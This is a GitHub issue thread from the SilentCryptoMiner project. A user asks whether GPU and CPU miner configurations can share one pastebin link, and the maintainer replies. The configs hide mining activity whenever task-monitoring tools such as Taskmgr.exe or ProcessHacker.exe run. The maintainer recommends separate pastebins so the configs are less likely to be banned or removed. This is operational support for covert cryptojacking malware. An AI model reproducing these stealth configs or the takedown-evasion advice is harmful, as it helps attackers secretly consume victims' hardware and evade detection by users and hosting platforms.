### ISSUE TITLE
Multiple Miners

### ISSUE THREAD

**Issue by msfcon5ol3** [UnamSanctam/SilentCryptoMiner#2294]
Since this can mine to multiple pools, can the miner have one ```zephyr``` and one ```etc``` config on the same pastebin or each algo have to be on separate links

![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/122618951/17de80fc-fc41-42e7-b703-16525e94120d)

Would this work for both on the same pastebin raw link ?

```
{
    "url": "stratum://`mywallet`.UNAM@etc.2miners.com:1010",
    "algo": "etchash",
    "max-gpu": 100,
    "idle-wait": 4,
    "idle-gpu": 100,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "",
    "stealth-fullscreen": true
}

{
    "algo": "rx/0",
    "pool": "127.0.0.1",
    "port": 80,
    "wallet": "ZEPHYR",
    "password": "UNAM",
    "nicehash": true,
    "ssltls": false,
    "max-cpu": 100,
    "idle-wait": 4,
    "idle-cpu": 100,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "",
    "stealth-fullscreen": true
}

```

The pastebin 

```https://pastebin.com/raw/6NZ6YzVj```

**Comment by UnamSanctam** [comment]
No you should use two separate Pastebins, it's also safer to do so since the reduced traffic (compared to both miners using the same pastebin) decreases the chance of it being banned/removed.
